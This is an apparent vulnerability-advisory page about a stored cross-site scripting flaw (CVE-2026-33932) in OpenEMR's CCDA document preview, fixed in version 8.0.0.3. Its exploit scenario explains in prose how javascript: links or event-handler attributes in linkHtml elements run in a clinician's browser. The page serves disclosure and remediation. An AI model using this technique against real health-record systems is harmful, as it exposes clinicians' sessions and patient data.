Skip to main content

Openemr CVE-2026-33932

HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-03-26 security-advisories@github.com
XSS Openemr
7.6
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.6 HIGH
AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Mar 26, 2026 - 00:22 vuln.today
CVE Published
Mar 26, 2026 - 00:16 nvd
HIGH 7.6

DescriptionGitHub Advisory

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, a stored cross-site scripting vulnerability in the CCDA document preview allows an attacker who can upload or send a CCDA document to execute arbitrary JavaScript in a clinician's browser session when the document is previewed. The XSL stylesheet sanitizes attributes for all other narrative elements but not for linkHtml, allowing href="javascript:..." and event handler attributes to pass through unchanged. Version 8.0.0.3 patches the issue.

AnalysisAI

A stored cross-site scripting (XSS) vulnerability exists in OpenEMR's CCDA document preview functionality that allows authenticated attackers to execute arbitrary JavaScript in clinician browser sessions. OpenEMR versions prior to 8.0.0.3 are affected. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attacker uploads malicious CCDA document
Delivery
XSL stylesheet fails to sanitize linkHtml element
Exploit
JavaScript payload embedded in href attribute
Execution
Clinician previews document in browser
Impact
Arbitrary JavaScript executes in clinician session
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Requires OpenEMR prior to version 8.0.0.3. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS score of 7.6 (High) reflects a network-based attack requiring low privileges and user interaction with changed scope, resulting in high confidentiality impact and low integrity impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with low-privileged access to an OpenEMR instance (such as a patient portal account or compromised external provider credentials) crafts a malicious CCDA document containing linkHtml elements with javascript: protocol URLs or event handler attributes like onclick. The attacker uploads this document through the patient portal or sends it via a health information exchange integration. …
Remediation Upgrade OpenEMR to version 8.0.0.3 or later, which contains the patch that properly sanitizes linkHtml attributes in CCDA documents. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Disable CCDA document preview functionality if operationally feasible, or restrict access to trusted users only. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-33932 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy